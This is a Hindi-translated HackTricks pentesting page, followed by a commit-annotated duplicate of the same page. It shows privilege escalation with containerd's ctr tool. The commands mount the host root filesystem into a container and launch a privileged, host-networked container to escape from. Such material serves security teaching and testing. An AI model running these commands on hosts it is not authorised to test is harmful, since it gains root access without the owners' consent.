hacktricks/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md

# कंटेनरड (ctr) प्रिविलेज एस्कलेशन

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>

* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह,
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**

</details>

## मूलभूत जानकारी

**कंटेनरड** और `ctr` क्या है इसे जानने के लिए निम्न लिंक पर जाएं:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
{% endcontent-ref %}

## PE 1

यदि आपको लगता है कि किसी होस्ट में `ctr` कमांड है:
```bash
which ctr
/usr/bin/ctr
```
आप छवियों की सूची बना सकते हैं:
```bash
ctr image list
REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
```
और फिर **उन छवियों में से एक को चलाएं जिसमें मेजबान रूट फ़ोल्डर को माउंट करें**:
```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
## PE 2

एक कंटेनर को विशेषाधिकार से चलाएं और उससे बाहर निकलें।
आप निम्नलिखित रूप में एक विशेषाधिकार से कंटेनर चला सकते हैं:
```bash
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
```
तो आप विशेषाधिकारिता का दुरुपयोग करके इससे बाहर निकलने के लिए निम्नलिखित पृष्ठ में उल्लिखित कुछ तकनीकों का उपयोग कर सकते हैं:

{% content-ref url="docker-security/" %}
[docker-security](docker-security/)
{% endcontent-ref %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह खोजें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपनी हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपना योगदान दें।**

</details>
Translated to Hindi 2023-11-06 08:38:02 +00:00			`# कंटेनरड (ctr) प्रिविलेज एस्कलेशन`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Hindi 2023-11-06 08:38:02 +00:00			<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			* क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को हैकट्रिक्स में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? [सदस्यता योजनाएं](https://github.com/sponsors/carlospolop) की जांच करें!
			`* खोजें [The PEASS Family](https://opensea.io/collection/the-peass-family), हमारा विशेष [NFT](https://opensea.io/collection/the-peass-family) संग्रह,`
			`* प्राप्त करें [आधिकारिक PEASS और HackTricks swag](https://peass.creator-spring.com)`
			* शामिल हों [💬](https://emojipedia.org/speech-balloon/) [डिस्कॉर्ड समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) या फॉलो करें मुझे ट्विटर [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).
			`* अपने हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) को।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Hindi 2023-11-06 08:38:02 +00:00			`## मूलभूत जानकारी`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			कंटेनरड और `ctr` क्या है इसे जानने के लिए निम्न लिंक पर जाएं:
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}`
			`[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% endcontent-ref %}`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`## PE 1`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			यदि आपको लगता है कि किसी होस्ट में `ctr` कमांड है:
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00			```bash
			`which ctr`
			`/usr/bin/ctr`
			```
Translated to Hindi 2023-11-06 08:38:02 +00:00			`आप छवियों की सूची बना सकते हैं:`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00			```bash
			`ctr image list`
Translated to Hindi 2023-11-06 08:38:02 +00:00			`REF TYPE DIGEST SIZE PLATFORMS LABELS`
			`registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -`
			`registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00			```
Translated to Hindi 2023-11-06 08:38:02 +00:00			`और फिर उन छवियों में से एक को चलाएं जिसमें मेजबान रूट फ़ोल्डर को माउंट करें:`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00			```bash
			`ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash`
			```
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`## PE 2`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			`एक कंटेनर को विशेषाधिकार से चलाएं और उससे बाहर निकलें।`
			`आप निम्नलिखित रूप में एक विशेषाधिकार से कंटेनर चला सकते हैं:`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00			```bash
Translated to Hindi 2023-11-06 08:38:02 +00:00			`ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00			```
Translated to Hindi 2023-11-06 08:38:02 +00:00			`तो आप विशेषाधिकारिता का दुरुपयोग करके इससे बाहर निकलने के लिए निम्नलिखित पृष्ठ में उल्लिखित कुछ तकनीकों का उपयोग कर सकते हैं:`
GitBook: [master] 423 pages and 2 assets modified 2021-01-03 00:43:09 +00:00
GITBOOK-3863: change request with no subject merged in GitBook 2023-04-05 15:16:57 +00:00			`{% content-ref url="docker-security/" %}`
			`[docker-security](docker-security/)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% endcontent-ref %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Hindi 2023-11-06 08:38:02 +00:00			* क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? [सदस्यता योजनाएं](https://github.com/sponsors/carlospolop) की जांच करें!
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [NFT](https://opensea.io/collection/the-peass-family) संग्रह खोजें`
			`* [आधिकारिक PEASS & HackTricks swag](https://peass.creator-spring.com) प्राप्त करें`
			`* [💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) में शामिल हों या मुझे Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live) का पालन करें.`
			`* अपनी हैकिंग ट्रिक्स को [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`